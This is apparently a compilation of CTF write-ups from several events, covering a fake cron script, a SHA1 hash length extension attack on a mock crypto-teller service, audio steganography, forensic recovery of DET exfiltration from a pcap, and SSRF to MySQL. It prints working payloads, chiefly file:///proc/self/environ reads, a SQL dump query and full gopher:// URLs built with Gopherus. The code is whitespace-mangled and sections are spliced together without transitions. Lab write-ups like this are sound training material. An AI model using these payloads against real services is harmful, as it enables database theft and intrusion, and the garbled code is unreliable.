description: Why not roll your own version of cron?
category: Linux - 300
According to the description, the server is running its own version of cron.
I started listing the running process:
This is the content of the /usr/bin/fakecron file:
#!/bin/bash
# Cron. But worse.
#
# Copyright (c) 2019, SuckMore Software, a division of WPI Digital Holdings Ltd.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyrig
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. All advertising materials mentioning features or use of this software
# must display the following acknowledgement:
# This product includes software developed by SuckMore Software, a division
# of WPI Digital Holdings Ltd.
# 4. Neither the name of the SuckMore Software, a division of WPI Digital Holdings
# Ltd, nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY SuckMore Software, a division of
# WPI Digital Holdings Ltd., ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
# SuckMore Software, a division of WPI Digital Holdings Ltd.
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
file="/etc/deadline"
cron(){second=0
minute=0
hour=0
day=1;month=1;year=2019;while true;do
sleep 1;target_second=`cut -d" "-f 6 $file`target_minute=`cut -d" "-f 5 $file`target_hour=`cut -d" "-f 4 $file`target_day=`cut -d" "-f 3 $file`target_month=`cut -d" "-f 2 $file`target_year=`cut -d" "-f 1 $file`if[["$second"-eq 59 ]];then
minute=$((minute+1));second=0;elif[["$minute"-eq 59 ]];then
hour=$((hour+1));second=0;minute=0;else
second=$((second+1));fi
if[["$year"-eq"$target_year"]]\
&&[["$month"-eq"$target_month"]]\
&&[["$day"-eq"$target_day"]]\
&&[["$hour"-eq"$target_second"]]\
&&[["$minute"-eq"$target_minute"]]\
&&[["$second"-eq"$target_hour"]];then# echo "WPI{}" > /home/ctf/flag.txt
exec_flag
fi
rm /etc/faketimerc
echo"$year-$month-$day$hour:$minute:$second"> /etc/faketimerc
done}
cron &
The script is will compare the current system time (and put it in /etc/faketimerc) to the content of /etc/deadline
There is just one thing to note !!
description: Two strange men called me last night. They call themselves the Bogdanoff twins. I don’t know much about cryptocurrency- can you help them with their scheme?
category: Cryptography - 150
Investigations :
First, let’s have a look to the leaked_source.py file:
importhashlibsecret=""defgenerate_command_token(command,secret):hashed=hashlib.sha1(secret+command).hexdigest()returnhasheddefvalidate_input(command,token_in):token=hash_command(command,secret)iftoken==token_in:returnTrueelse:returnFalsewhile(True):print("Command:")command=raw_input(">>>")print('Auth token:')token=raw_input(">>>")printifvalidate_input(command,token)==False:print("Error: Auth token does not match provided command..")else:execute_command(command)print
Well, we do not have the whole code but we can easily guess what we have to do.
When you see {SOME_HASHING_FUNC}(secret+command)
it’s about hash length extension attack and you can find some good information about it here
This attack consists in adding a payload in your entry so that when you calculate the new hash, you won’t have to know the secret. This attack would not work if it was SOME_HASHING_FUNC(command+secret).
Let’s now see this service using nc… we obtain this output:
$ nc bogged.wpictf.xyz 31337
BOGDANOFF:
Bonjour...
We have access to the Binance backdoor, and got you into a compromised teller station.
We need you to steal tethered cryptocurrency from people's wallets.
We were halted by an unfortunate countermeasure in the teller system, but we have an account ready to recieve the stolen crypto.
Steal the currency from cryptowojak123. Transfer it to not_b0gdan0ff.
Transfer everything... then we will kill him, and find another.
Do not fail us.
Welcome to the Binance Teller Terminal!
Please remember to use admin-issued auth tokens with each account transfer!
Either enter a command or one of the following keywords:
accounts: List of accounts currently on the system.
history: A history of prior terminal commands.
help: A reminder on how to use this terminal.
Command:
>>>help
You may either withdraw funds from an account or deposit funds to an account.
Withdraw with the following command:
withdraw ACCOUNT_NAME
Deposit with the following command:
deposit ACCOUNT_NAME
Commands may be chained, as follows:
withdraw ACCOUNT_NAME;deposit ACCOUNT_NAME;...
An authorization token unique to the command contents must exist for the transaction to succeed!
(Sorry, but we have to protect from malicious employees.)
Contact admin@dontactuallyemailthis.net to get auth tokens for different transfer commands!
Command:
>>>history
///// TRANSACTION HISTORY //////////////////////////
Command:
>>>withdraw john.doe
Auth token:
>>>b4c967e157fad98060ebbf24135bfdb5a73f14dc
Action successful!
Command:
>>>withdraw john.doe;deposit xXwaltonchaingangXx
Auth token:
>>>455705a6756fb014a4cba2aa0652779008e36878
Action successful!
Command:
>>>withdraw cryptowojak123;deposit xXwaltonchaingangXx
Auth token:
>>>e429ffbfe7cabd62bda3589576d8717aaf3f663f
Action successful!
Command:
>>>withdraw john.doe
Auth token:
>>>b4c967e157fad98060ebbf24135bfdb5a73f14dc
Action successful!
////////////////////////////////////////////////////
Command:
>>>
So we have some transaction history and we want to transfer money from cryptowojak123 to not_b0gdan0ff.
We detect 1 interesting transaction fast and it will be useful later:
To inject a payload, we first need to know the secret length (I’ll injection only a ‘;’ for the moment) :
Great, our command is unreadable but our injection worked ! now let send something else than ‘;’, for example ‘;withdraw xXwaltonchaingangXx; deposit not_b0gdan0ff;’:
YEAH ! flag is : WPI{duMp_33t_aNd_g@rn33sh_H1$_wAg3$}
The challenge was providing a link to a web page containing an audio file : theMusical.mp3
Opened with Audacity, we get the following :
When we listen to the sound, we can recognize piano notes.
If you have the perfect pitch, you can easily recognize the notes that you are hearing.
If not, then you can use any tuner app on your smartphone, just like everyone…
At the end you should get the following notes :
We can notice that in most cases, each every 3 notes, we’ve got an “E”.
The total amount of notes is 63 and 63 / 3 = 21. So we can think that we have 21 groups of 3 notes.
Now let’s try to put values on them…
The lowest note in term of frequency is D4, so let’s consider it as our “base” and assign to it the value 0.
In this way, we can increment the value of the following notes and obtain :
Given the previous picture, we can convert our notes to values and then recognize the octal values of ASCII symbols :
description: Hey psst Petit, je t’ai entendu dans le bar. Tu cherches M0th3r ? oO Ne fais pas cette tète, faut vraiment que t’apprenne a être plus discret. J’écoute tout ce qui se passe à Cyber Build. D’ailleurs voici la capture d’une de ses dernières Opération. Ça vaut de l’OR.
category: Forensic
The challenge was providing a network traffic capture file : caper.pcapng.
When we anlyse the first TCP session, we can see the following HTTP request: GET /config.json
The content of the JSON file is show on the screenshot below:
This file is a configuration file used by the tool DET (extensible) Data Exfiltration Toolkit.
This tool gives the ability to exfiltrate files from a network by using multiple protocols and techniques.
The file to exfiltrate is encrypted before beeing cut into pieces which are then sent base 64 encoded to the exfiltration server.
In our case 2 protocols were used for exfiltration : ICMP and HTTP.
And the key used for AES encryption : “S3cur1tyD4y”
Extract data from ICMP :
For this channel, the data is inserted into the Data field of ICMP request.
We can use Tshark to gather the raw data inserted in the ICMP requests :
tshark -r caper.pcapng -Y"icmp.type==0"-T fields -e data
After converting the bytes into ASCII characters, we can decode the base64 and get some parts of the transaction :
We can see that we get the registration of the file with its filename and its hash, part 1 and part 2 of the data and the final message ending the transaction.
We still miss part 0 and part 3 of the data in order to recover the original file.
Extract data from HTTP :
For this channel, the data is send over POST requests (application/x-www-form-urlencoded).
Again, we use Tshark to extract the data from the PCAP :
We first need to put back the different parts of the transaction in the right order.
We can then remove the first and last parts : I5LS9MX|!|flag.txt|!|REGISTER|!|3ec59ac658986a43921d824ae06ea494 and I5LS9MX|!|4|!|DONE.
We also remove the prefix : I5LS9MX|!|<id>|!| to keep only the AES encrypted data.
We can then write a script based on the source code of DET to decrypt the message :
description: M0th3r >Hey bah quoi ? Tu t’attendais au grand M0th3r légendaire. Désolé de te décevoir. Il parait que tu veux servir la cause ? Tu m’as trouvé mais c’est pas encore gagné. C’est pas dit que j’te prenne sous mon aisselle. Tiens, entraîne toi, et on verra peut être si t’as l’étoffe d’un Pirate Cybernétique.
category: Web
First Eckmühl Down web challenge was a simple SSRF, where you had to request the service listening on the port 22. it would make a request to the URL and export the content as a PDF file. With it we can get the flag ESGI{Duke-083-B4seLine-J.D.456}.
The next challenge Rookie(ctf.hacklab-esgi.org:8082), was also an SSRF, once again we can try to scan the port and we see the port 3306 (MySQL is open), a direct nmap scan will show it as filtered.
<h1>Website checker</h1><p>Nous utilisons une nouvelle technologie parfaitement sûre pour tester vos divers sites internet. N'hésitez pas à nous donner du Dodgecoin!</p><formaction="index.php"method="post">
URL Checker :
<inputtype="text"name='url'/></form>
Let’s extract the source code of the challenge in order to get more context. First we extract the current working directory from /proc/self/environ with the following payload file:///proc/self/environ.
Now we know the web application is located at /var/www/html/, with the same trick we can request the content of index.php.
<?phpinclude_once"config_test.php";?>
There is a mention of a config_test.php file, this one contains the following line // TODO: MySQL connection with "tiix" user and adding a MySQL password....
Now we know a user tiix, also he doesn’t have a password, based on that we can craft a payload to interact the MySQL database. Using Gopherus and the DumpInOneShot payload from PayloadsAllTheThings.
Dump in one shot payload : (select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#.
The Gopher protocol allows us to send arbitratry content to a service.
The challenge has a table nothinghere and users. First we can extract users from the database : gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%20%00%00%00%03%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%73%65%63%75%72%69%74%79%64%61%79%2e%75%73%65%72%73%01%00%00%00%01.
Some nice passwords, now let’s get the flag from security.nothinghere.
python2 gopherus.py --exploit mysql
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
For making it work username should not be password protected!!!
Give MySQL username: tiix
Give query to execute: select flag from securityday.nothinghere;
Your gopher link is ready to do SSRF :
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%2a%00%00%00%03%73%65%6c%65%63%74%20%66%6c%61%67%20%66%72%6f%6d%20%73%65%63%75%72%69%74%79%64%61%79%2e%6e%6f%74%68%69%6e%67%68%65%72%65%3b%01%00%00%00%01
